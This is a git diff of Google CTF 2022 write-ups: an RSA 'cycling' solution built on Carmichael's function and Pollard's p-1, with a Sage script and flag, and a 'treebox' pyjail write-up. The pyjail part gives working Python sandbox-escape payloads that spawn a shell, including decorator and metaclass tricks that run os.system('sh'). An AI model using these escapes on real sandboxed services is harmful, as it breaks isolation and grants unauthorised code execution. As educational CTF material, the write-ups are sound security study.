+This quantity is known as Euler's totient $\varphi(n)$.
+
+Furthermore, from Euler's theorem (or Lagrange's theorem if we frame it in a group-theoretic way), we know that any number $x$ taken to the $\varphi(n)$th power (mod $n$), results in the identity $1$.
+This property is in fact vital for the correctness of RSA, as we rely on the fact that $x^{\varphi(n)} \equiv 1 \pmod n$ when we say that $x^{ed} \equiv \left(x^{\varphi(n)}\right)^k x \equiv x$.
+
+From all this known theory underlying the RSA cryptosystem, we can now finally make a first deduction: $e^{R + 1} \equiv 1 \pmod{\varphi(n)}$.
+
+## Background: Carmichael's $\lambda$
+
+Actually, that previous statement is what you would say with a basic understanding of the principles underlying RSA, but it's in fact not entirely correct.
+It could very well be the case that $x^\ell \equiv 1 \pmod n$ for $\ell < \varphi(n)$.
+Moreover, this will be the case for *every* $x$ when $n = pq$ is an RSA modulus.
+One thing that Lagrange's theorem will still give us, even when $\ell \ne \varphi(n)$, is that $\ell \mid \varphi(n)$.[^1]
+
+The *smallest* exponent such that $x^\ell \equiv 1 \pmod n$ for *all* $x$ is known as the Carmichael function $\lambda(n)$.
+We know that $\lambda(n) \mid \varphi(n)$, but we can even write down a nicer formula:[^2]
+
+$$
+\lambda(p_1^{r_1}p_2^{r_2}\ldots p_m^{r_m}) = \mathrm{lcm}(p_1^{r_1 - 1}(p_1 - 1), \ldots, p_m^{r_m - 1}(p_m - 1))
+$$
+
+which, when we apply this to our RSA modulus $n$, becomes
+
+$$
+\lambda(pq) = \mathrm{lcm}(p - 1, q - 1)
+$$
+
+Returning to our wrong statement from before, we now know that $e^{R + 1} \equiv 1 \pmod \ell$ where $\ell \mid \lambda(n)$, and furthermore, since $e$ doesn't look too suspicious, nor can a readable flag be influenced all *that* much, we can in fact hope that $e^{R + 1} \equiv 1 \pmod{\lambda(n)}$.
+
+[^1]: Read as: $\ell$ divides $\varphi(n)$
+[^2]: For simplicity, we restrict the choices of $p_i^{r_i}$ here to those values where $p_i \ne 2$ or $r_i < 3$, see e.g. the [wikipedia page](https://en.wikipedia.org/wiki/Carmichael_function) for the full details.
+
+## Factors of factors of factors; and some subtractions
+
+Now that we understand the nuances of the formula $x^\ell \equiv 1$ a bit better, we can think further towards solving this challenge.
+Remember what we wrote down earlier?
+
+$$
+e^{R + 1} \equiv 1 \pmod{\lambda(n)}
+$$
+
+This tells us something more, since we have exactly the form of statement that led us to introducing $\lambda(n)$ in the first place.
+If $R + 1$ is the smallest exponent for which this holds, that is, the multiplicative order of $e$ modulo $\lambda(n)$, we can now say that $R + 1 \mid \lambda(\lambda(n))$, which gives us a somewhat nice relation between the value $R$ we'd been given, and our RSA modulus $n$.
+
+Let's not worry about the possibility that $R + 1$ is only a divisor, and instead assume that it holds with equality $R + 1 = \lambda(\lambda(n))$.
+Then we can try to write down what we expect $R + 1$ to be:[^3]
+
+$$
+\begin{aligned}
+R + 1 = \lambda(\lambda(n)) &= \lambda(\mathrm{lcm}(p - 1, q - 1)) \\
+ &= \lambda(2s_1s_2\ldots s_m) \\
+ &= \mathrm{lcm}(s_1 - 1, \ldots, s_m - 1)
+\end{aligned}
+$$
+
+We now would like to relate these values $s_i - 1$ to $R$ somehow.
+By the above, it should be clear that any $s_i - 1 \mid R + 1$, so when we list all divisors of $R + 1$ in turn, and add $1$ to them, we should end up with a set of candidates $\mathcal{C}$, such that $\\{s_i\\}_i \subseteq \mathcal{C}$.
+The value $R + 1$ itself is not particularly easy to factor in a short amount of time, but luckily it's not an esoteric, unknown value, but a nicely structured one.
+And, as often happens with nicely structured values, it shows up on [factordb](http://factordb.com/index.php?query=2%5E1025+-+2).
+
+[^3]: Yet another minor assumption is introduced here, that none of the prime factors we deal with has a higher power than $1$. As we'll be able to observe from the factorization of $R + 1$ later, this doesn't seem too unlikely.
+
+
+## Who cares if it's not *the* private key? It works
+
+With the set $\mathcal{C}$, what could we do?
+One option to consider is applying the same trick again, but using $\mathcal{C}$ rather than the factorization of $R + 1$, to recover $p$ and $q$.
+Annoyingly, $\mathcal{C}$ is a rather large set, and enumerating all subsets of it takes exponential time, so we'll have to throw that idea out.
+
+Instead, let's look back at our initial, more naive, understanding of the RSA cryptosystem, where we used $\varphi(n)$ rather than $\lambda(n)$ to compute the decryption exponent $d = e^{-1} \pmod{\varphi(n)}$.
+Even though we didn't have the smallest modulus possible, we still had full correctness, since --- as we know by now --- $\lambda(n) \mid \varphi(n)$.
+We can take that to the extreme: we know/assume that all prime factors $s_i$ of $\lambda(n)$ are among our candidates in $\mathcal{C}$, so if we simply take $\Xi = \prod_{c \in \mathcal{C}} c$, it should hold that $\lambda(n) \mid \Xi$ (recall that we assumed $\lambda(n)$ to be square-free), and as such, we could use $\Xi$ as a "replacement" for $\lambda(n)$ or $\varphi(n)$ when it comes to computing a decryption exponent.
+
+With this, we have enough ideas and information to finally solve this challenge[^4].
+
+> `CTF{Recycling_Is_Great}`
+
+[^4]: [...] for the first time. We'll also look at the intended solution after this, which takes a somewhat similar approach initially, but then applies it to factoring $n$ directly.
+
+## All your factorbase are belong to us
+
+The official [intended solution](https://github.com/google/google-ctf/blob/master/2022/crypto-cycling/src/solve.py) relies on similar observations, but instead of finding some number $k\lambda(n)$, it uses those potential factors of $\lambda(n)$ to directly factor the modulus $n$.[^5]
+To understand how this factorization works, we look back at a well-known, simple special-purpose factoring algorithm: [Pollard's `p - 1` algorithm](https://en.wikipedia.org/wiki/Pollard%27s_p_%E2%88%92_1_algorithm).
+
+Pollard's algorithm allows finding a factor $p$ (say for $n = pq$) under the assumption that $p - 1$ is $B$-powersmooth.
+That is, all prime power divisors $s^r \mid p - 1$ are bounded by $s^r < B$.
+This property enables us to find some product $M$ of prime powers less than $B$, such that $p - 1 \mid M$ but $q - 1 \nmid M$.
+In turn, looking at Fermat's little theorem, we can see that for all $a$ coprime to $p$, it holds that $a^M \equiv 1 \pmod p$, but it will often be the case that $a^M \not\equiv 1 \pmod q$, and so computing $\gcd(a^M - 1, n)$ should allow us to recover $p$.
+Traditionally, Pollard's method computes $a^M \pmod n$ by repeatedly taking $s$th powers of an accumulator and testing whether the $\gcd$ results in a factorization.
+The advantage of this is twofold: one doesn't need to fully compute $M$ in its entirety[^6] and as long as the largest factor of $p - 1$ differs from the largest factor of $q - 1$,[^7] the method will still work, rather than yielding $n$ as the $\gcd$.
+
+To abstract the bound $B$ away, we simply notice that all it gives us is some superset $\mathcal{C}$ of prime (power) factors of $p - 1$.
+This is exactly what we already found by enumerating primes $s_i$ such that $s_i - 1 \mid R + 1$!
+If we call such a set $\mathcal{C}$ a [factor base](https://en.wikipedia.org/wiki/Factor_base), and slightly generalize Pollard's algorithm, we can apply it to our situation as well.
+And this is exactly the approach we see in the official solution script: we take some base $a$ (there called $m$), repeatedly exponentiate it by potential prime factors, and check if $\gcd(a' - 1, n) \notin \{1, n\}$.
+
+Once a factorization of $n$ is found, it is of course only a matter of performing regular RSA decryption to obtain the flag.
+
+[^5]: In this script, we can also observe a clean explanation of why $R + 1$ can be easily factored or found on factordb: $R + 1 = 2(2^{1024} - 1)$ is twice a [Mersenne number](https://en.wikipedia.org/wiki/Mersenne_prime).
+[^6]: Computing all of $M$ would result in a potentially huge number that is unwieldy to work with.
+[^7]: Alternatively, we could reorder the factors in question, replace the notion of "largest" by "latest in the reordered sequence", though that is less practical from an implementation point of view.
+
+## Does this always work?
+
+Until now, we've made several assumptions that turned out to be correct, in order to solve this challenge.
+Even the official solution turns out to rely on those assumptions,[^8] so we'd like to have a look at how much trouble we'd be in if the assumptions were violated.
+To restate our assumptions more explicitly:
+
+1. $R + 1 = \lambda(\lambda(n))$
+   - The inner $\lambda$ corresponds to the multiplicative order of the flag, $\|m\| \pmod n$
+   - The outer $\lambda$ corresponds to the multiplicative order of $e$, modulo $\|m\|$
+2. $p - 1$ and $q - 1$ are square-free, that is, none of their prime factors occur with multiplicity $> 1$.
+3. All $s_i - 1$ are square-free, where $s_i \mid \lambda(n)$, but this has been confirmed by the factorization of $R + 1$
+
+And let's also introduce some counterexamples for all of these, where our assumption is violated and our solution breaks:
+
+1. We explore the possibility for both $\lambda$s:
+   - Let $n = 77$, then $\lambda(n) = \mathrm{lcm}(6, 10) = 30$, but for the message $m = 15$, it's already true that $m^5 \equiv 1 \pmod n$, rather than the expected $m^{30}$.
+     This in turn implies that we only need $e^{R + 1} \equiv 1 \pmod 5$ to completely decrypt this message by cycling.
+   - We now use $n = 989 = 23\times43$, so $\lambda(n) = 2\times3\times7\times11 = 462$ and $\lambda(\lambda(n)) = \mathrm{lcm}(2, 6, 10) = 30$, but for instance $e = 379$ only has multiplicative order $5$ modulo $\lambda(n)$.
+2. Consider $n = 163\times67 = 10921$, then $\lambda(n) = \mathrm{lcm}(2\times3^4, 2\times3\times11) = 2\times3^4\times11 = 1782$.
+   $\lambda(\lambda(n))$ would then be $2\times3^3\times5$, and we'd never pick up $3^4$ as a potential factor out of any subset.
+3. Similar issues to the earlier point occur, except they are introduced slightly later in the process of computing $\lambda(\lambda(n))$.
+
+Other than those assumptions, there are some more things that can go wrong.
+We've relied on enumerating all subsets of factors of $R + 1$, but, as we remarked when discarding the idea of repeating such an enumeration on its own result, that takes exponential time in the number of factors.
+If we end up with a large number of these factors, we might in fact already get in trouble trying to enumerate all subsets, and spend a long time waiting for that.[^9]
+On the flip side of that coin, to obtain that initial list of factors, we need to be able to factor this value $R + 1$.
+Now, if we consider for instance the worst case, where $p$ and $q$ are what we could call *doubly-safe* primes, i.e. $p = 2(2p' + 1) + 1$ where $p$ and $\frac{p - 1}{2}$ are both safe primes, there's only a minor difference in number of bits between $n$ and $\lambda(\lambda(n)) = 2p'q'$, and the latter is, up to the factor $2$, even a new RSA modulus.
+By assumed security of RSA (unless you get extra information like in this challenge), factoring that would not be feasible.
+
+
+[^8]: After the end of the CTF, one of the organizers clarified that the challenge description would have better stated that the given number of repetitions works for *any* exponent $e$. [reference](https://discord.com/channels/984515980766109716/984516677624541194/993499537580761119).
+[^9]: This does make me wonder if some other modification of e.g. the `p - 1` algorithm might be able to deal with this issue, but so far I've been unable to come up with a proper adaptation. I'm always open for comments or ideas if you would happen to have any on this topic.
+
+## Can we fix it?
+
+> Yes we can!
+
+Sort of, at least.
+Unless my very vague notion from the footnote in the previous section pans out, I don't expect we could get around the exponential time enumeration, or the factoring problems.
+We can however try to fix up some of the problems our assumptions brought along, and get a slightly more generic solution.
+
+Let's first look at the case where $\|m\| < \lambda(n)$.
+Since for our original approach, we only care about $m$ itself, and not about factoring, we only need to find a multiple of $\|m\|$, which we still get from our powerset enumeration (under the assumption, for now, that we get $\lambda(\|m\|)$).
+This means we can still compute an effective decryption exponent that works for $m$ itself, and any element with an order dividing $\|m\|$.
+Moreover, we can still use this to fully factor $n$ too.
+Once we decrypt $m$, we know that $m^{k\|m\|} \equiv 1 \pmod n$, which means we can again apply our `p - 1` approach with a factor base to find an exponent $M$ such that $m^M \equiv 1 \pmod p$.
+Note that we require the use of $m$ as basis here, rather than an arbitrary number $a$.
+The only condition under which this will still necessarily fail is when $\|m\|$ divides $\gcd(p - 1, q - 1)$, since then any exponent such that $m^M \equiv 1 \pmod p$ also satisfies $m^M \equiv 1 \pmod q$.[^10]
+
+[^10]: Taken to the extreme, we might suddenly be able to factorize again, when e.g. $m^2 \equiv 1 \pmod n$.
+
+Next, we investigate the case where $R + 1 \ne \lambda(\|m\|)$.
+Unfortunately, the solution here isn't quite as clean.
+When the order of $e$ is too small, we simply lack the information to recover enough primes.
+When the order of $e$ is only slightly too small, we should be able to salvage it with only a constant cost to our computation time.
+Pick a fixed-size (multi)set of small primes $\mathcal{P}$, and let $\mathcal{C}' = \mathcal{C} \cup \mathcal{P}$.
+This increases the computation time by a factor of $2^{\|\mathcal{P}\|}$, but as long as the "lost" factor of $\lambda(\|m\|)$ is factorable over $\mathcal{P}$, our algorithm works again.
+Optionally, if we would like to deal with more complex situations, we could also construct more complex ways to add extra factors.
+For example, an approach comparable to the "two-stage" variant of the `p - 1` algorithm is possible, where we take e.g. at most 4 "small" primes and 1 "medium" sized extra prime.
+
+Finally, how can we deal with the annoyance of prime powers?
+To deal with prime power divisors of $\lambda(n)$, it's possible to apply a strategy similar to the `p - 1` factoring algorithm, where every prime factor is simply included multiple times.
+Since exponents larger than $2$ can be detected in the factorization of $R + 1$, we recommend including each factor twice, unless evidence to the contrary is present from the factorization of $R + 1$.[^11]
+The more conservative approach would be to include each prime $s$ a number of times proportional to $\frac{\log(n)}{\log(s)}$, which comes at an obvious computational cost.
+For the prime power divisors of $\lambda(\lambda(n))$, we'll need to do just a bit more work.
+If we see a prime power $s^r$ when factoring $R + 1$, it should be clear from how $\lambda$ works that we expect to also see the factors of $s - 1$ appear.
+In that case, it's obvious that $s^{r + 1}$ should be in $\mathcal{C}$.
+When however $s^2 \mid s_i$, we only see $s$ and the factors of $s - 1$ appear when factoring $R + 1$.
+Hence, when we add a prime to $\mathcal{C}$ that still divides $R + 1$, we should add it with a higher multiplicity.
+
+[^11]: One exception here might be for powers of $2$, since that's always the oddest prime, and it behaves differently when computing $\lambda$.
+
+## Talk is cheap, show me the code
+
+We present here the code as we implemented it during the CTF.
+That is, making maximal assumptions such that it still gets the flag.
+The code for factorization based on Pollard's `p - 1` algorithm can be found in the [official solution](https://github.com/google/google-ctf/blob/master/2022/crypto-cycling/src/solve.py).
+Interested readers are encouraged to understand, implement and share the suggested improvements of this article :)
+
+```sage
+proof.all(False) # speed up primality checking a bit
+import itertools
+from Crypto.Util.number import long_to_bytes
+
+# From the itertools documentation/example
+def powerset(iterable):
+    "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
+    s = list(iterable)
+    return itertools.chain.from_iterable(itertools.combinations(s, r) for r in range(len(s)+1))
+
+# From factordb
+factors = [2, 3, 5, 17, 257, 641, 65537, 274177, 2424833, 6700417, 67280421310721, 1238926361552897, 59649589127497217, 5704689200685129054721, 7455602825647884208337395736200454918783366342657, (2^256+1)//1238926361552897, (2^512+1)//18078591766524236008555392315198157702078226558764001281]
+assert 2**1025-2 == prod(factors)
+
+C = []
+for ps in powerset(factors):
+    v = prod(ps) + 1
+    if is_prime(v):
+        C.append(v)
+Ξ = prod(C)
+
+e = 65537
+n = 0x99efa9177387907eb3f74dc09a4d7a93abf6ceb7ee102c689ecd0998975cede29f3ca951feb5adfb9282879cc666e22dcafc07d7f89d762b9ad5532042c79060cdb022703d790421a7f6a76a50cceb635ad1b5d78510adf8c6ff9645a1b179e965358e10fe3dd5f82744773360270b6fa62d972d196a810e152f1285e0b8b26f5d54991d0539a13e655d752bd71963f822affc7a03e946cea2c4ef65bf94706f20b79d672e64e8faac45172c4130bfeca9bef71ed8c0c9e2aa0a1d6d47239960f90ef25b337255bac9c452cb019a44115b0437726a9adef10a028f1e1263c97c14a1d7cd58a8994832e764ffbfcc05ec8ed3269bb0569278eea0550548b552b1
+ct = 0x339be515121dab503106cd190897382149e032a76a1ca0eec74f2c8c74560b00dffc0ad65ee4df4f47b2c9810d93e8579517692268c821c6724946438a9744a2a95510d529f0e0195a2660abd057d3f6a59df3a1c9a116f76d53900e2a715dfe5525228e832c02fd07b8dac0d488cca269e0dbb74047cf7a5e64a06a443f7d580ee28c5d41d5ede3604825eba31985e96575df2bcc2fefd0c77f2033c04008be9746a0935338434c16d5a68d1338eabdcf0170ac19a27ec832bf0a353934570abd48b1fe31bc9a4bb99428d1fbab726b284aec27522efb9527ddce1106ba6a480c65f9332c5b2a3c727a2cca6d6951b09c7c28ed0474fdc6a945076524877680
+
+d = pow(e, -1, Ξ)
+print(long_to_bytes(int(pow(ct, d, n))))
+```
diff --git a/GCTF-2022/index.html b/GCTF-2022/index.html
new file mode 100755
index 0000000..6357754
--- /dev/null
+++ b/GCTF-2022/index.html
@@ -0,0 +1,219 @@
+
+
+
+
+
+Google CTF 2022 | Organisers
Python was one of the first programming languages I became acquainted with, and to this day remains one of – and probably even the – main language I go back to when I need to quickly write something, ranging from a proof of concept, to a hacky script that does some math when I’m too lazy, to the ever-recurring CTF solution scripts.1
+As such, ever since I started playing CTFs and encountering pyjail challenges, I’ve thoroughly enjoyed the concept of these jails, the act of playing Houdini, and even occasionally creating some pyjail challenges myself.
+For some earlier pyjails I particularly enjoyed, see my writeups for this recent challenge on DiceCTF or the 0CTF/TCTF challenge that, to the best of my knowledge, was the first to introduce the audit hook system as a jailing mechanism2.
+
+
Through this fascination and repeated exposure to pyjail challenges, in combination with coincidentally opening up the challenge rather early on, I was able to snatch the first blood on it.
+To my own surprise, I went from first looking at the challenge file to obtaining the flag in only 2 minutes.
+
+
I was able to find several of the approaches and techniques presented further on by myself/independently, but in order to present a wider overview of the used attack surfaces, I also referenced the publicly posted exploits in the CTF discord.
+Even for those approaches where I constructed my own viable payloads, I attempt to reference some messages posted in the #sandbox channel of the public discord after the conclusion of the CTF.
+
+
One interesting thing to notice for this challenge in particular, and presumably a reason for the high solve count, is that several of the pyjail escape methods listed on the hacktricks page apply directly to this challenge, so the situation is already well-documented.
+
+
The great snake, constricted
+
+
Let’s first have a look at what the challenge allows us to do, or rather what it doesn’t allow us to do:
+
+
#!/usr/bin/python3 -u
+#
+# Flag is in a file called "flag" in cwd.
+#
+# Quote from Dockerfile:
+# FROM ubuntu:22.04
+# RUN apt-get update && apt-get install -y python3
+#
+import ast
+import sys
+import os
+
+def verify_secure(m):
+    for x in ast.walk(m):
+        match type(x):
+            case (ast.Import|ast.ImportFrom|ast.Call):
+                print(f"ERROR: Banned statement {x}")
+                return False
+    return True
+
+abspath = os.path.abspath(__file__)
+dname = os.path.dirname(abspath)
+os.chdir(dname)
+
+print("-- Please enter code (last line must contain only --END)")
+source_code = ""
+while True:
+    line = sys.stdin.readline()
+    if line.startswith("--END"):
+        break
+    source_code += line
+
+tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
+if verify_secure(tree):  # Safe to execute!
+    print("-- Executing safe code:")
+    compiled = compile(source_code, "input.py", 'exec')
+    exec(compiled)
+
+
+
Summarized: there is an ast based blacklist in place that prevents us from either calling functions3 or importing modules through the import statement.
+As far as I’m aware, ast relies on the actual parser that the python interpreter itself uses, so we’re unlikely to encounter any parser differentials to abuse here.
+On the upside, and something that’s certainly not a guarantee in this kind of challenge, we do have full access to all python builtins.
+There are also no character-level blocks, so we could use parentheses in some context if we wanted; as long as they’re not used to call a function.
+
+
On the topic of import statements, it’s worth noting that, with the access to the python builtins that we have, being able to call functions is enough, since the __import__ function could do everything we need from it.
+
+
Our end goal for this challenge would be an (arbitrary) file read of the flag file, but of course we won’t say no to getting full code execution if it happens to fit our needs.
+
+
My very first solution is similar to the polygl0ts writeup for the noparensjail challenge from b01lers CTF 2021.
+Contrary to the intended solution presented by the people from b01lers, we can’t directly use import, so we need some other approach.
+Luckily, the polygl0ts approach works, but is a bit more convoluted than what we really need.
+
+
To see why exactly, and to see the beauty of this exploit, we first make a quick detour through two short python expressions that can give us full code execution without further restrictions4 (either still in python, or directly in a shell).
+Without a doubt, the shortest expression I know that achieves this is help(), which can spawn a shell through the more pager if a topic that takes up more than a page is requested at the interactive help prompt.
+Unfortunately, that requires both a pager being present, and a tty, which isn’t the case for this challenge.
+So instead, I went for the second convenient method I knew: exec(input()).
+Since we arrive in a fresh execution context, with arbitrary code sent through stdin, the ast blacklist no longer applies to our new code, and we can do whatever we want from there.
+
+
So the full exploit code is something as simple as
+
+
@exec
+@input
+class X:
+    pass
+
+
+
and keeping in mind how decorators work, we can see that this code is equivalent to
+
+
class X:
+    pass
+X = input(X)
+X = exec(X)
+
+
+
which is essentially the same as our wanted exec(input()) other than the fact that input(X) will also print a representation of the class X to stdout before reading.
+
+
Since decorators aren’t parsed as call expressions or statements, this passes the blacklist, and allows us to finally pass in an input such as import os; os.system("sh") to obtain a shell and display the flag.
+
+
See this example for a similar exploit template, but going through some different methods to establish code execution.
+
+
Alternative approaches
+
+
With my initial solution behind us now, let’s have a look at some of the other approaches, and general techniques that can also allow flag recovery on this challenge.
+The general spirit behind all of these will obviously be to use something in the python ecosystem that ends up calling a function, without being an explicit function call.
+The approaches I found or observed roughly fall into three categories:
+
+
+
Operator overloading
+
Function overwriting
+
Interpreter hooks
+
+
+
These categories can of course overlap somewhat, or not exactly cover everything, but you get the idea :)
In python, operator overloading in general works by writing custom functions on your class with special names.
+These are also known as dunder methods, after how the names are all enclosed in double underscores, such as the well-known __init__ constructor.
+So if we can overwrite functions such as __getitem__ or __add__ on a class, or if we can write our own classes with those methods, we can get function calls for example with
+
+
obj[argument]
+# Or
+obj+argument
+
+
+
To overwrite these methods on existing classes/objects, we need to find something that’s implemented in plain python, as things implemented in C/in extension modules are read-only.
+Some of the possible approaches are for example:
Hippity, hoppity, this attribute is now my property
+
+
Since some of these don’t take any arguments at all, we’ll also need some “one-shot” functions that we can leverage to get either an arbitrary file read, or more python control.
+
+
For arbitrary file read, one approach includes overwriting some of the innards of the license() builtin function.5
+More specifically, overwriting the “private”6 member variable that specifies which files it reads license information from.
+Another approach calls the breakpoint() builtin, that by default points to pdb.set_trace(), which spawns a pdb debugger.
+With a debugger, we can easily evaluate arbitrary python code again to obtain a system shell.
+
+
Other functions that can be overwritten to get a one-shot function call include sys.stdout.flush, which gets called upon interpreter exit, and sys.stderr.flush, which can be triggered when an exception occurs.
+Both the os and sys modules were already imported in the parent context, so we can access either sys directly, or pass through os.sys.
+
+
Everything is an object, even if it’s a class
+
+
Next up, let’s explore a few ways to create objects, of course without calling the constructor explicitly.
+The first approach towards this we can use relies on the concept of metaclasses.
+In short, a class is itself also an object, and its type/class is known as a metaclass.
+The standard metaclass for classes is type, whose own metaclass is, interestingly, type.
+The key thing that metaclasses allow us to do is make an instance of a class, without calling the constructor directly, by creating a new class with the target class as metaclass.7
+Since this is all a bit confusing, perhaps, let’s show some example code:
+
+
# This will define the members on the "sub"class
+class Metaclass(type):  # Must derive from type to be usable as a metaclass
+    __getitem__ = exec  # So Sub[string] will execute exec(string)
+# Note: Metaclass.__class__ == type
+
+class Sub(metaclass=Metaclass):  # That's how we make Sub.__class__ == Metaclass
+    pass  # Nothing special to do
+
+assert isinstance(Sub, Metaclass)
+Sub['import os; os.system("sh")']
+
+
+
One other example takes this further by overloading the __instancecheck__ dunder and triggering it through a match statement (example).
+
+
Exceptional function calls
+
+
Another approach to making instances of a class is also documented on hacktricks: throw and catch an exception.
+Throwing an exception without arguments will automatically call its constructor.
+Then we can either use one of our previously-covered one-shot functions (example), or use the operator overloading as with the metaclasses above (what hacktricks does).
+
+
Writing a one-shot function taking three arguments to sys.excepthook could also allow for exploitation by throwing an (uncaught) exception.
+
+
And finally, looking at the reference solution, we can see that there’s even some room to exploit OS/distro-specific functionality to combine with error handling and operator overloading to execute code.
+In particular, here the interpreter will try to import an apt-specific module to potentially report an error in ubuntu-provided modules, but import will instead construct an object that will call an overloaded operator to execute code.
+Without overwriting __import__ and applying the previous exception-based object construction instead, we could also apply the same __init__ to __iadd__ chaining as demonstrated here.
+More generally, defining __init__ will allow for similar one-shot approaches taking an arbitrary number of arguments, such as we wished for above:
This jail was leakier than a sieve, and it probably had the largest number of sufficiently distinct potential solutions I’ve seen on a pyjail so far.
+Together with some payloads that could be directly copy-pasted from previous writeups and hacktricks, this led to a high number of solves.
+The challenge itself was however still a lot of fun, and particularly interesting as a case-study of exploitation approaches that are allowed by a minimal-but-not-trivial AST-based blacklist,8 for which I would like to thank the author.
+
+
Addendum
+
+
While there were a lot of different exploits possible, I’m particularly happy with my initial one, for a few arbitrary reasons:
+
+
+
It got me a quick first blood
+
It’s one of the few exploits that don’t need any parentheses at all
+
When looking at it as a code golf challenge, it has the lowest number of characters I’ve seen in any of the solutions posted on discord. This can even be improved upon slightly by replacing the pass in the class body with simply the constant 0.
+
+
+
+
+
And of course, the existence of tools such as sage that plug into this ecosystem and that are indispensable for cryptographic exploration only serve to enhance my dependency on python. ↩
+
+
+
Since writing this, I’ve been informed that there were in fact earlier CTFs doing this that I was unaware of. For instance this French CTF did it before, and potentially there’d be others too. ↩
+
+
+
Or prevents us from calling callables in general, really. For instance constructing a class isn’t really calling a function, but it would get caught here too. ↩
+
+
+
As long as we still have access to the python builtins, otherwise we need to circumvent that, potentially in the second stage again too. ↩
+
+
+
See hacktricks for a reference on exactly which member to write to. ↩
This is starting to feel like a “how many times can you use the word class in a sentence while still being understandable and correct”… ↩
+
+
+
And obviously, that is exactly what this writeup aims to be :) ↩
diff --git a/GCTF-2022/sandbox/treebox.md b/GCTF-2022/sandbox/treebox.md
new file mode 100755
index 0000000..e170945
--- /dev/null
+++ b/GCTF-2022/sandbox/treebox.md
@@ -0,0 +1,233 @@
+# Treebox
+
+**Author**: Robin_Jadoul
+
+**Tags**: pyjail
+
+**Points**: 50 (268 solves)
+
+**Alternate URL**:
+
+**Description**:
+
+> I think I finally got Python sandboxing right.
+
+
+## On the topic of pyjails
+
+Python was one of the first programming languages I became acquainted with, and to this day remains one of -- and probably even *the* -- main language I go back to when I need to quickly write something, ranging from a proof of concept, to a hacky script that does some math when I'm too lazy, to the ever-recurring CTF solution scripts.[^1]
+As such, ever since I started playing CTFs and encountering pyjail challenges, I've thoroughly enjoyed the concept of these jails, the act of playing Houdini, and even occasionally creating some pyjail challenges myself.
+For some earlier pyjails I particularly enjoyed, see my writeups for [this recent challenge on DiceCTF](https://ur4ndom.dev/posts/2022-02-08-dicectf-ti1337/) or [the 0CTF/TCTF challenge](https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/) that, to the best of my knowledge, was the first to introduce the audit hook system as a jailing mechanism[^audithookctf].
+
+[^1]: And of course, the existence of tools such as [sage](https://sagemath.org) that plug into this ecosystem and that are indispensable for cryptographic exploration only serve to enhance my dependency on python.
+[^audithookctf]: Since writing this, I've been informed that there were in fact earlier CTFs doing this that I was unaware of. For instance this [French CTF](https://redoste.xyz/2020/05/04/fr-write-up-fcsc-2020-why-not-a-sandbox/) did it before, and potentially there'd be others too.
+
+Through this fascination and repeated exposure to pyjail challenges, in combination with coincidentally opening up the challenge rather early on, I was able to snatch the first blood on it.
+To my own surprise, I went from first looking at the challenge file to obtaining the flag in only **2** minutes.
+
+I was able to find several of the approaches and techniques presented further on by myself/independently, but in order to present a wider overview of the used attack surfaces, I also referenced the publicly posted exploits in the CTF discord.
+Even for those approaches where I constructed my own viable payloads, I attempt to reference some messages posted in the #sandbox channel of the [public discord](https://discord.gg/nt6JFkk3mu) after the conclusion of the CTF.
+
+One interesting thing to notice for this challenge in particular, and presumably a reason for the high solve count, is that several of the pyjail escape methods listed on [the hacktricks page](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes) apply directly to this challenge, so the situation is already well-documented.
+
+## The great snake, constricted
+
+Let's first have a look at what the challenge allows us to do, or rather what it doesn't allow us to do:
+
+```python
+#!/usr/bin/python3 -u
+#
+# Flag is in a file called "flag" in cwd.
+#
+# Quote from Dockerfile:
+# FROM ubuntu:22.04
+# RUN apt-get update && apt-get install -y python3
+#
+import ast
+import sys
+import os
+
+def verify_secure(m):
+    for x in ast.walk(m):
+        match type(x):
+            case (ast.Import|ast.ImportFrom|ast.Call):
+                print(f"ERROR: Banned statement {x}")
+                return False
+    return True
+
+abspath = os.path.abspath(__file__)
+dname = os.path.dirname(abspath)
+os.chdir(dname)
+
+print("-- Please enter code (last line must contain only --END)")
+source_code = ""
+while True:
+    line = sys.stdin.readline()
+    if line.startswith("--END"):
+        break
+    source_code += line
+
+tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
+if verify_secure(tree):  # Safe to execute!
+    print("-- Executing safe code:")
+    compiled = compile(source_code, "input.py", 'exec')
+    exec(compiled)
+```
+
+Summarized: there is an `ast` based blacklist in place that prevents us from either calling functions[^2] or importing modules through the `import` statement.
+As far as I'm aware, `ast` relies on the actual parser that the python interpreter itself uses, so we're unlikely to encounter any parser differentials to abuse here.
+On the upside, and something that's certainly not a guarantee in this kind of challenge, we do have full access to all python builtins.
+There are also no character-level blocks, so we *could* use parentheses in some context if we wanted; as long as they're not used to call a function.
+
+On the topic of `import` statements, it's worth noting that, with the access to the python builtins that we have, being able to call functions is enough, since the `__import__` function could do everything we need from it.
+
+[^2]: Or prevents us from calling *callables* in general, really. For instance constructing a class isn't really calling a function, but it would get caught here too.
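
To get a feel for what the blacklist does and does not catch, the check can be replayed offline. The snippet below is a sketch that mirrors `verify_secure` with a hypothetical helper `banned_nodes` (not part of the challenge), using `isinstance` instead of `match` so that it also runs on interpreters older than 3.10.

```python
import ast

BANNED = (ast.Import, ast.ImportFrom, ast.Call)

def banned_nodes(source):
    """Names of the banned node types found anywhere in the parsed source."""
    tree = ast.parse(source, "input.py", "exec")
    return [type(node).__name__ for node in ast.walk(tree) if isinstance(node, BANNED)]

print(banned_nodes("import os"))        # ['Import']
print(banned_nodes("open('flag')"))     # ['Call']
print(banned_nodes("x = (1 + 2) * 3"))  # []  (parentheses alone are fine)
print(banned_nodes("y = [1, 2][0]"))    # []  (subscripting is not a call)
```

Running candidate payloads through such a helper before sending them to the server makes it quick to see which syntax survives the filter.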
+
+Our end goal for this challenge would be an (arbitrary) file read of the `flag` file, but of course we won't say no to getting full code execution if it happens to fit our needs.
+
+My very first solution is similar to the [polygl0ts writeup](https://polygl0ts.ch/writeups/2021/b01lers/pyjail_noparens/README.html) for the [noparensjail](https://github.com/b01lers/b01lers-ctf-2021/tree/main/misc/noparensjail) challenge from b01lers CTF 2021.
+Contrary to the intended solution presented by the people from b01lers, we can't directly use `import`, so we need some other approach.
+Luckily, the polygl0ts approach works, but is a bit more convoluted than what we really need.
+
